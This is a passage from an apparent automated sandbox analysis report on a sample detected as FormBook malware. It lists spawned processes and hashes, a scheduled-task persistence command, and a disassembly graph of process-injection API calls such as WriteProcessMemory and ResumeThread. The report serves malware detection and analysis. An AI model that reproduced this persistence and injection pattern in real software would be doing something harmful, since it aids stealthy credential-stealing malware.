                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:6
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:7
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp2505.tmp"
                                                                        Imagebase:0xda0000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:8
                                                                        Start time:03:13:13
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:9
                                                                        Start time:03:13:14
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                        Imagebase:0xa60000
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:03:13:14
                                                                        Start date:28/11/2024
                                                                        Path:C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\AppData\Roaming\uFEeKIucsX.exe
                                                                        Imagebase:0x620000
                                                                        File size:929'800 bytes
                                                                        MD5 hash:0C0B6ED60E0309998DA4AE71469F1D84
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 24%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:03:13:16
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                        Imagebase:0x7ff6ef0c0000
                                                                        File size:496'640 bytes
                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:03:13:24
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uFEeKIucsX" /XML "C:\Users\user\AppData\Local\Temp\tmp4E47.tmp"
                                                                        Imagebase:0xda0000
                                                                        File size:187'904 bytes
                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:03:13:24
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:15
                                                                        Start time:03:13:24
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                        Imagebase:0x710000
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:16
                                                                        Start time:03:13:28
                                                                        Start date:28/11/2024
                                                                        Path:C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe"
                                                                        Imagebase:0xe20000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:17
                                                                        Start time:03:13:29
                                                                        Start date:28/11/2024
                                                                        Path:C:\Windows\SysWOW64\systray.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\systray.exe"
                                                                        Imagebase:0x9f0000
                                                                        File size:9'728 bytes
                                                                        MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:18
                                                                        Start time:03:13:43
                                                                        Start date:28/11/2024
                                                                        Path:C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe"
                                                                        Imagebase:0xe20000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:20
                                                                        Start time:03:13:54
                                                                        Start date:28/11/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff79f9e0000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:10.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:211
                                                                          Total number of Limit Nodes:7
                                                                          execution_graph 28152 5f1e1a1 28153 5f1e135 28152->28153 28155 5f1e1aa 28152->28155 28156 5f1e141 PostMessageW 28153->28156 28157 5f1e17c 28156->28157 28157->28152 27926 5f1a175 27927 5f1a0be 27926->27927 27928 5f1a0ce 27926->27928 27932 5f1cbd0 27927->27932 27951 5f1cbce 27927->27951 27970 5f1cc8a 27927->27970 27933 5f1cbea 27932->27933 27934 5f1cbf2 27933->27934 27990 5f1d955 27933->27990 27995 5f1d0f1 27933->27995 27999 5f1d36c 27933->27999 28004 5f1d56a 27933->28004 28012 5f1d708 27933->28012 28016 5f1d262 27933->28016 28025 5f1d3c2 27933->28025 28030 5f1d400 27933->28030 28035 5f1d421 27933->28035 28040 5f1d4e1 27933->28040 28045 5f1d05f 27933->28045 28050 5f1d13f 27933->28050 28055 5f1da1c 27933->28055 28060 5f1d29a 27933->28060 28068 5f1d477 27933->28068 28073 5f1d6b7 27933->28073 27934->27928 27952 5f1cbea 27951->27952 27953 5f1cbf2 27952->27953 27954 5f1d0f1 2 API calls 27952->27954 27955 5f1d955 2 API calls 27952->27955 27956 5f1d6b7 4 API calls 27952->27956 27957 5f1d477 2 API calls 27952->27957 27958 5f1d29a 4 API calls 27952->27958 27959 5f1da1c 2 API calls 27952->27959 27960 5f1d13f 2 API calls 27952->27960 27961 5f1d05f 2 API calls 27952->27961 27962 5f1d4e1 2 API calls 27952->27962 27963 5f1d421 2 API calls 27952->27963 27964 5f1d400 2 API calls 27952->27964 27965 5f1d3c2 2 API calls 27952->27965 27966 5f1d262 4 API calls 27952->27966 27967 5f1d708 2 API calls 27952->27967 27968 5f1d56a 4 API calls 27952->27968 27969 5f1d36c 2 API calls 27952->27969 27953->27928 27954->27953 27955->27953 27956->27953 27957->27953 27958->27953 27959->27953 27960->27953 27961->27953 27962->27953 27963->27953 27964->27953 27965->27953 27966->27953 27967->27953 27968->27953 27969->27953 27971 5f1cbd7 27970->27971 27973 5f1cc8c 27970->27973 27971->27970 27972 5f1cbf2 27971->27972 27974 5f1d0f1 2 API calls 27971->27974 27975 5f1d955 2 API calls 27971->27975 27976 5f1d6b7 4 API calls 27971->27976 27977 5f1d477 2 API calls 27971->27977 27978 5f1d29a 4 API calls 27971->27978 27979 5f1da1c 2 API calls 27971->27979 27980 5f1d13f 2 API calls 27971->27980 27981 5f1d05f 2 API calls 27971->27981 27982 5f1d4e1 2 API calls 27971->27982 27983 5f1d421 2 API calls 27971->27983 27984 5f1d400 2 API calls 27971->27984 27985 5f1d3c2 2 API calls 27971->27985 27986 5f1d262 4 API calls 27971->27986 27987 5f1d708 2 API calls 27971->27987 27988 5f1d56a 4 API calls 27971->27988 27989 5f1d36c 2 API calls 27971->27989 27972->27928 27973->27928 27974->27972 27975->27972 27976->27972 27977->27972 27978->27972 27979->27972 27980->27972 27981->27972 27982->27972 27983->27972 27984->27972 27985->27972 27986->27972 27987->27972 27988->27972 27989->27972 27991 5f1d95b 27990->27991 28086 5f19390 27991->28086 28090 5f19388 27991->28090 27992 5f1d981 28094 5f19c98 27995->28094 28098 5f19c8c 27995->28098 28000 5f1d372 27999->28000 28002 5f19390 ResumeThread 28000->28002 28003 5f19388 ResumeThread 28000->28003 28001 5f1d981 28002->28001 28003->28001 28005 5f1d570 28004->28005 28007 5f1d14b 28005->28007 28102 5f1dd89 28005->28102 28107 5f1dd98 28005->28107 28006 5f1d981 28008 5f19390 ResumeThread 28007->28008 28009 5f19388 ResumeThread 28007->28009 28008->28006 28009->28006 28014 5f19440 Wow64SetThreadContext 28012->28014 28015 5f19438 Wow64SetThreadContext 28012->28015 28013 5f1d722 28014->28013 28015->28013 28017 5f1d285 28016->28017 28120 5f19a10 28017->28120 28124 5f19a08 28017->28124 28018 5f1d14b 28019 5f1d21a 28018->28019 28023 5f19390 ResumeThread 28018->28023 28024 5f19388 ResumeThread 28018->28024 28019->27934 28020 5f1d981 28023->28020 28024->28020 28026 5f1d14b 28025->28026 28028 5f19390 ResumeThread 28026->28028 28029 5f19388 ResumeThread 28026->28029 28027 5f1d981 28028->28027 28029->28027 28031 5f1d32d 28030->28031 28031->28030 28032 5f1d701 28031->28032 28033 5f19a10 WriteProcessMemory 28031->28033 28034 5f19a08 WriteProcessMemory 28031->28034 28032->27934 28033->28031 28034->28031 28036 5f1da23 28035->28036 28128 5f19b00 28036->28128 28132 5f19af8 28036->28132 28037 5f1da45 28042 5f1d14b 28040->28042 28041 5f1d981 28043 5f19390 ResumeThread 28042->28043 28044 5f19388 ResumeThread 28042->28044 28043->28041 28044->28041 28046 5f1d069 28045->28046 28047 5f1d120 28046->28047 28048 5f19c98 CreateProcessA 28046->28048 28049 5f19c8c CreateProcessA 28046->28049 28047->27934 28048->28047 28049->28047 28051 5f1d14b 28050->28051 28053 5f19390 ResumeThread 28051->28053 28054 5f19388 ResumeThread 28051->28054 28052 5f1d981 28053->28052 28054->28052 28056 5f1da22 28055->28056 28057 5f1da45 28056->28057 28058 5f19b00 ReadProcessMemory 28056->28058 28059 5f19af8 ReadProcessMemory 28056->28059 28058->28057 28059->28057 28061 5f1d2a0 28060->28061 28062 5f1d4af 28061->28062 28063 5f1d48e 28061->28063 28136 5f19950 28061->28136 28140 5f19948 28061->28140 28062->27934 28066 5f19a10 WriteProcessMemory 28063->28066 28067 5f19a08 WriteProcessMemory 28063->28067 28066->28062 28067->28062 28069 5f1d47d 28068->28069 28071 5f19a10 WriteProcessMemory 28069->28071 28072 5f19a08 WriteProcessMemory 28069->28072 28070 5f1d4af 28070->27934 28071->28070 28072->28070 28074 5f1d65c 28073->28074 28075 5f1d6c4 28073->28075 28076 5f1d32d 28074->28076 28082 5f19a10 WriteProcessMemory 28074->28082 28083 5f19a08 WriteProcessMemory 28074->28083 28075->28076 28078 5f1d14b 28075->28078 28077 5f1d701 28076->28077 28084 5f19a10 WriteProcessMemory 28076->28084 28085 5f19a08 WriteProcessMemory 28076->28085 28077->27934 28078->28077 28080 5f19390 ResumeThread 28078->28080 28081 5f19388 ResumeThread 28078->28081 28079 5f1d981 28080->28079 28081->28079 28082->28076 28083->28076 28084->28076 28085->28076 28087 5f193d0 ResumeThread 28086->28087 28089 5f19401 28087->28089 28089->27992 28091 5f193d0 ResumeThread 28090->28091 28093 5f19401 28091->28093 28093->27992 28095 5f19d21 CreateProcessA 28094->28095 28097 5f19ee3 28095->28097 28099 5f19c98 CreateProcessA 28098->28099 28101 5f19ee3 28099->28101 28103 5f1ddad 28102->28103 28112 5f19440 28103->28112 28116 5f19438 28103->28116 28104 5f1ddc3 28104->28007 28108 5f1ddad 28107->28108 28110 5f19440 Wow64SetThreadContext 28108->28110 28111 5f19438 Wow64SetThreadContext 28108->28111 28109 5f1ddc3 28109->28007 28110->28109 28111->28109 28113 5f19485 Wow64SetThreadContext 28112->28113 28115 5f194cd 28113->28115 28115->28104 28117 5f19485 Wow64SetThreadContext 28116->28117 28119 5f194cd 28117->28119 28119->28104 28121 5f19a58 WriteProcessMemory 28120->28121 28123 5f19aaf 28121->28123 28123->28018 28125 5f19a10 WriteProcessMemory 28124->28125 28127 5f19aaf 28125->28127 28127->28018 28129 5f19b4b ReadProcessMemory 28128->28129 28131 5f19b8f 28129->28131 28131->28037 28133 5f19b00 ReadProcessMemory 28132->28133 28135 5f19b8f 28133->28135 28135->28037 28137 5f19990 VirtualAllocEx 28136->28137 28139 5f199cd 28137->28139 28139->28063 28141 5f19950 VirtualAllocEx 28140->28141 28143 5f199cd 28141->28143 28143->28063 28158 31f4668 28159 31f4669 28158->28159 28160 31f46a4 28159->28160 28162 31f4838 28159->28162 28163 31f483c 28162->28163 28167 31f4948 28163->28167 28171 31f4937 28163->28171 28168 31f4949 28167->28168 28170 31f4a4c 28168->28170 28175 31f4544 28168->28175 28173 31f493c 28171->28173 28172 31f4a4c 28172->28172 28173->28172 28174 31f4544 CreateActCtxA 28173->28174 28174->28172 28176 31f5dd8 CreateActCtxA 28175->28176 28178 31f5e9b 28176->28178 28178->28178 28144 31fb1d0 28147 31fb2b7 28144->28147 28145 31fb1df 28148 31fb2fc 28147->28148 28149 31fb2d9 28147->28149 28148->28145 28149->28148 28150 31fb500 GetModuleHandleW 28149->28150 28151 31fb52d 28150->28151 28151->28145 28179 31fd560 28180 31fd565 28179->28180 28184 31fd730 28180->28184 28188 31fd740 28180->28188 28181 31fd693 28185 31fd734 28184->28185 28192 31fd308 28185->28192 28189 31fd741 28188->28189 28190 31fd308 DuplicateHandle 28189->28190 28191 31fd76e 28190->28191 28191->28181 28193 31fd7a8 DuplicateHandle 28192->28193 28195 31fd76e 28193->28195 28195->28181

                                                                          Executed Functions

                                                                          Function 031F7051 Relevance: .2, Instructions: 207COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d74ea547d83fc4726b24ec25516717445ff484508a1318c99b5106de0e04f299
                                                                          • Instruction ID: 02821868bb3a9ead0b1d48bd79fcf9644eb8af56c8aabf00961ac52d23328dd9
                                                                          • Opcode Fuzzy Hash: d74ea547d83fc4726b24ec25516717445ff484508a1318c99b5106de0e04f299
                                                                          • Instruction Fuzzy Hash: B591C7B8E012098FCB44DFA9C990AEEFBB2FF88310F148069D515AB3A5DB355946DF50
                                                                          Function 031F43E8 Relevance: .2, Instructions: 192COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 167eb4d19ab1befc33da1f2fda57779d72a948c5f9d44a51099ef5d5ecb92e78
                                                                          • Instruction ID: 26ca6b001c46a5b1628e44605c101faac494759cc3221c1e792a9c9a1b0ba84e
                                                                          • Opcode Fuzzy Hash: 167eb4d19ab1befc33da1f2fda57779d72a948c5f9d44a51099ef5d5ecb92e78
                                                                          • Instruction Fuzzy Hash: 8081B5B8E012098FCB48DFA9C990AEEFBB2FF88310F148069D515AB365DB315945DF50
                                                                          Function 05F1D22F Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7085d98f1453d4f8a25b79d933a853c418c738e87372862d480939549259fce8
                                                                          • Instruction ID: b76e038799f019c116c1130668b33bdba99cd57f9267e9b1917c2f2e34e5d954
                                                                          • Opcode Fuzzy Hash: 7085d98f1453d4f8a25b79d933a853c418c738e87372862d480939549259fce8
                                                                          • Instruction Fuzzy Hash: BDE04635D0E2848FC702DB3499852F0BBFEAB0B200F5821D6C88ADB113C22946A48B1A
                                                                          Function 05F19C8C Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 404 5f19c8c-5f19d2d 407 5f19d66-5f19d86 404->407 408 5f19d2f-5f19d39 404->408 415 5f19d88-5f19d92 407->415 416 5f19dbf-5f19dee 407->416 408->407 409 5f19d3b-5f19d3d 408->409 410 5f19d60-5f19d63 409->410 411 5f19d3f-5f19d49 409->411 410->407 413 5f19d4b 411->413 414 5f19d4d-5f19d5c 411->414 413->414 414->414 417 5f19d5e 414->417 415->416 418 5f19d94-5f19d96 415->418 424 5f19df0-5f19dfa 416->424 425 5f19e27-5f19ee1 CreateProcessA 416->425 417->410 419 5f19db9-5f19dbc 418->419 420 5f19d98-5f19da2 418->420 419->416 422 5f19da4 420->422 423 5f19da6-5f19db5 420->423 422->423 423->423 426 5f19db7 423->426 424->425 427 5f19dfc-5f19dfe 424->427 436 5f19ee3-5f19ee9 425->436 437 5f19eea-5f19f70 425->437 426->419 429 5f19e21-5f19e24 427->429 430 5f19e00-5f19e0a 427->430 429->425 431 5f19e0c 430->431 432 5f19e0e-5f19e1d 430->432 431->432 432->432 434 5f19e1f 432->434 434->429 436->437 447 5f19f80-5f19f84 437->447 448 5f19f72-5f19f76 437->448 450 5f19f94-5f19f98 447->450 451 5f19f86-5f19f8a 447->451 448->447 449 5f19f78 448->449 449->447 452 5f19fa8-5f19fac 450->452 453 5f19f9a-5f19f9e 450->453 451->450 454 5f19f8c 451->454 456 5f19fbe-5f19fc5 452->456 457 5f19fae-5f19fb4 452->457 453->452 455 5f19fa0 453->455 454->450 455->452 458 5f19fc7-5f19fd6 456->458 459 5f19fdc 456->459 457->456 458->459 461 5f19fdd 459->461 461->461
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F19ECE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: c3e27e036f291b0bb2780521d4f79d0fa2f731ccbe6db6792cfeb4d81c8341ee
                                                                          • Instruction ID: 1842a00b1bc7b44b573f8b96f859aaec2b0951d688083804ffacdb500119e9a8
                                                                          • Opcode Fuzzy Hash: c3e27e036f291b0bb2780521d4f79d0fa2f731ccbe6db6792cfeb4d81c8341ee
                                                                          • Instruction Fuzzy Hash: E6A18D71D00219DFDF20DF68C955BEDBBB2BF48310F0481A9E849A7284DBB89985CF95
                                                                          Function 05F19C98 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 462 5f19c98-5f19d2d 464 5f19d66-5f19d86 462->464 465 5f19d2f-5f19d39 462->465 472 5f19d88-5f19d92 464->472 473 5f19dbf-5f19dee 464->473 465->464 466 5f19d3b-5f19d3d 465->466 467 5f19d60-5f19d63 466->467 468 5f19d3f-5f19d49 466->468 467->464 470 5f19d4b 468->470 471 5f19d4d-5f19d5c 468->471 470->471 471->471 474 5f19d5e 471->474 472->473 475 5f19d94-5f19d96 472->475 481 5f19df0-5f19dfa 473->481 482 5f19e27-5f19ee1 CreateProcessA 473->482 474->467 476 5f19db9-5f19dbc 475->476 477 5f19d98-5f19da2 475->477 476->473 479 5f19da4 477->479 480 5f19da6-5f19db5 477->480 479->480 480->480 483 5f19db7 480->483 481->482 484 5f19dfc-5f19dfe 481->484 493 5f19ee3-5f19ee9 482->493 494 5f19eea-5f19f70 482->494 483->476 486 5f19e21-5f19e24 484->486 487 5f19e00-5f19e0a 484->487 486->482 488 5f19e0c 487->488 489 5f19e0e-5f19e1d 487->489 488->489 489->489 491 5f19e1f 489->491 491->486 493->494 504 5f19f80-5f19f84 494->504 505 5f19f72-5f19f76 494->505 507 5f19f94-5f19f98 504->507 508 5f19f86-5f19f8a 504->508 505->504 506 5f19f78 505->506 506->504 509 5f19fa8-5f19fac 507->509 510 5f19f9a-5f19f9e 507->510 508->507 511 5f19f8c 508->511 513 5f19fbe-5f19fc5 509->513 514 5f19fae-5f19fb4 509->514 510->509 512 5f19fa0 510->512 511->507 512->509 515 5f19fc7-5f19fd6 513->515 516 5f19fdc 513->516 514->513 515->516 518 5f19fdd 516->518 518->518
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F19ECE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 72731f6044245a956be93df73dbea295e212dcbdbb988f10260149c3562ae92e
                                                                          • Instruction ID: e22ea1f229b3b14a2bf3971c364e3aef17b4d7c4f7ca8873d4bed78ce614e3c4
                                                                          • Opcode Fuzzy Hash: 72731f6044245a956be93df73dbea295e212dcbdbb988f10260149c3562ae92e
                                                                          • Instruction Fuzzy Hash: 5A918C71D00219DFDF20DF68C951BEDBBB2BF48310F0481A9E809A7284DBB89985CF95
                                                                          Function 031FB2B7 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 519 31fb2b7-31fb2d7 520 31fb2d9-31fb2e6 call 31f9d40 519->520 521 31fb303-31fb307 519->521 527 31fb2fc 520->527 528 31fb2e8 520->528 523 31fb31b-31fb35c 521->523 524 31fb309-31fb313 521->524 530 31fb35e-31fb366 523->530 531 31fb369-31fb377 523->531 524->523 527->521 579 31fb2ee call 31fb550 528->579 580 31fb2ee call 31fb560 528->580 530->531 532 31fb39b-31fb39d 531->532 533 31fb379-31fb37e 531->533 538 31fb3a0-31fb3a7 532->538 535 31fb389 533->535 536 31fb380-31fb387 call 31faf58 533->536 534 31fb2f4-31fb2f6 534->527 537 31fb438-31fb4b2 534->537 540 31fb38b-31fb399 535->540 536->540 569 31fb4b9-31fb4f8 537->569 570 31fb4b4-31fb4b7 537->570 541 31fb3a9-31fb3b1 538->541 542 31fb3b4-31fb3bb 538->542 540->538 541->542 545 31fb3bd-31fb3c5 542->545 546 31fb3c8-31fb3d1 call 31faf68 542->546 545->546 550 31fb3de-31fb3e3 546->550 551 31fb3d3-31fb3db 546->551 552 31fb3e5-31fb3ec 550->552 553 31fb401-31fb405 550->553 551->550 552->553 555 31fb3ee-31fb3fe call 31faf78 call 31faf88 552->555 576 31fb408 call 31fb830 553->576 577 31fb408 call 31fb850 553->577 578 31fb408 call 31fb860 553->578 555->553 558 31fb40b-31fb40e 560 31fb431-31fb437 558->560 561 31fb410-31fb42e 558->561 561->560 571 31fb4fa-31fb4fd 569->571 572 31fb500-31fb52b GetModuleHandleW 569->572 570->569 571->572 573 31fb52d-31fb533 572->573 574 31fb534-31fb548 572->574 573->574 576->558 577->558 578->558 579->534 580->534
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 031FB51E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: fabee3ec9ef5312dc8dc897a1048237e99cc1f3785a9109708f239034cf8f277
                                                                          • Instruction ID: 544c1d5cc433ba81d30e5e17520712e40446d07a0f09fa8243b97c7f52cb182c
                                                                          • Opcode Fuzzy Hash: fabee3ec9ef5312dc8dc897a1048237e99cc1f3785a9109708f239034cf8f277
